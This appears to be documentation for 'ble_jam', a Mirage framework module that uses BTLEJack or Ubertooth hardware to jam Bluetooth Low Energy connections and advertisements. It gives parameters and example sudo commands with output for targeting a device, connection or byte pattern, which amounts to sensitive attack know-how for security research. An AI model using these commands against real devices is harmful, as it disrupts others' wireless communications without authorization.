ble_jam

Presentation

ble_jam allows to use the jamming features implemented in BTLEJack or Ubertooth : it allows to jam a new connection (“newConnections” as JAMMING_MODE) or an existing connection (“existingConnections” as JAMMING_MODE). You can provide additional parameters for targeting a specific device, such as TARGET (if the mode is “newConnections”) or ACCESS_ADDRESS, CRC_INIT, CHANNEL_MAP (if the mode is “existingConnections”). If the custom version of the BTLEJack firmware is in use, you can also use some additional jamming features allowing to reactively jam some specific advertisements. You can provide a specific target using the TARGET input parameter (the advertisements emitted by this target will be reactively jammed on the channel provided as the CHANNEL input parameter, allowing to corrupt the transmitted frames). You can also choose a custom jamming pattern by providing the PATTERN input parameter and its position in the Link Layer packet (OFFSET). This module needs ble_sniff. If multiple interfaces are provided, the sniffers will be distributed on the three advertising channels.

Warning

This attack is sometimes unstable, and may require multiple attempts. This module is experimental and is only provided as a proof of concept.

Compatible devices

Input parameters

Name

Default value

Possible values

Description

INTERFACE

microbit0

microbitX,ubertoothX

Primary interface to use

INTERFACEA

microbitX,ubertoothX

Optionnal additional interface

INTERFACEB

microbitX

Optionnal additional interface

TARGET

<BD address>

Target address

CHANNEL

37

37|38|39

Communication channel to jam

JAMMING_MODE

advertisements

newConnections|existingConnections|advertisements

Jamming strategy

ACCESS_ADDRESS

0xYYYY

Access address for an existing connection

CRC_INIT

0xYYYYYY

CRCInit for an existing connection

CHANNEL_MAP

0xYYYYYYYYYY

Channel Map for an existing connection

PATTERN

<hexadecimal>

Pattern included in the Link Layer advertisements to reactively jam

OFFSET

<integer>

Position of pattern in the Link Layer advertisements

Output parameters

This module doesn’t provide any output parameters.

Usage

Jamming a new connection

If you want to easily jam a new connection, please provides “newConnections” as value of the input parameter JAMMING_MODE, and optionally a target :

$ sudo mirage ble_jam JAMMING_MODE=newConnections
[INFO] Module ble_jam loaded !
[SUCCESS] BTLEJack device #0 successfully instantiated (firmware version : 3.14)
[INFO] Custom Mirage Firmware used ! Advertisements sniffing and jamming will be supported.
┌Sniffed Connection─────────┬──────────────┬──────────────┬───────────────┐
│ Access Address │ CRCInit  │ Channel Map  │ Hop Interval │ Hop Increment │
├────────────────┼──────────┼──────────────┼──────────────┼───────────────┤
│ 0xcd5cdb3f     │ 0x9b03c3 │ 0x1e007fffff │ 36           │ 9             │
└────────────────┴──────────┴──────────────┴──────────────┴───────────────┘
[PACKET] [ CH:37|CLK:1559493296.836213|RSSI:0dBm ] << BLE - Advertisement Packet | type=CONNECT_REQ | srcAddr=7F:C2:DC:21:C2:B7 | dstAddr=FF:FF:60:A5:17:44 | accessAddress=0x3fdb5ccd| crcInit=0xc3039b| channelMap=0x1e007fffff| hopInterval=36| hopIncrement=9 >>
[INFO] Recovering Hop Interval ...
[...]

Then, the module tries to jam the corresponding connection.

Jamming an existing connection

Similarly, if you want to jam an existing connection, please sets “existingConnections” as value of the input parameter JAMMING_MODE :

$ sudo mirage ble_jam JAMMING_MODE=existingConnections

Then, the execution is quite similar to the previously described one.

Jamming the advertisements transmitted by a specific device

If you want to jam the advertisements transmitted by a specific device, you need to have a custom version of BTLEJack installed on your Micro:Bit(s). Then you can use the “advertisements” mode as JAMMING_MODE and provide the BD address to jam (using the TARGET input parameter) :

$ sudo mirage ble_jam JAMMING_MODE=advertisements TARGET=FF:FF:60:A5:17:44
[INFO] Module ble_jam loaded !
[SUCCESS] BTLEJack device #0 successfully instantiated (firmware version : 3.14)
[INFO] Custom Mirage Firmware used ! Advertisements sniffing and jamming will be supported.
[INFO] Advertisement jammed on channel #37
[INFO] Advertisement jammed on channel #37
[INFO] Advertisement jammed on channel #37
[INFO] Advertisement jammed on channel #37
[INFO] Advertisement jammed on channel #37
[INFO] Advertisement jammed on channel #37
[INFO] Advertisement jammed on channel #37
[INFO] Advertisement jammed on channel #37
[INFO] Advertisement jammed on channel #37
[INFO] Advertisement jammed on channel #37
^C[INFO] Mirage process terminated !

Jamming the advertisements containing a specific pattern

If you want to jam the advertisements containing a specific pattern, you need to have a custom version of BTLEJack installed on your Micro:Bit(s). Then you can use the “advertisements” mode as JAMMING_MODE and provide the pattern to jam (using the PATTERN and OFFSET input parameters) :

$ sudo mirage ble_jam JAMMING_MODE=advertisements PATTERN=112233445566 OFFSET=8
[INFO] Module ble_jam loaded !
[SUCCESS] BTLEJack device #0 successfully instantiated (firmware version : 3.14)
[INFO] Custom Mirage Firmware used ! Advertisements sniffing and jamming will be supported.
[INFO] Advertisement jammed on channel #37
[INFO] Advertisement jammed on channel #37
[INFO] Advertisement jammed on channel #37
[INFO] Advertisement jammed on channel #37
[INFO] Advertisement jammed on channel #37
[INFO] Advertisement jammed on channel #37
[INFO] Advertisement jammed on channel #37
[INFO] Advertisement jammed on channel #37
[INFO] Advertisement jammed on channel #37
[INFO] Advertisement jammed on channel #37
^C[INFO] Mirage process terminated !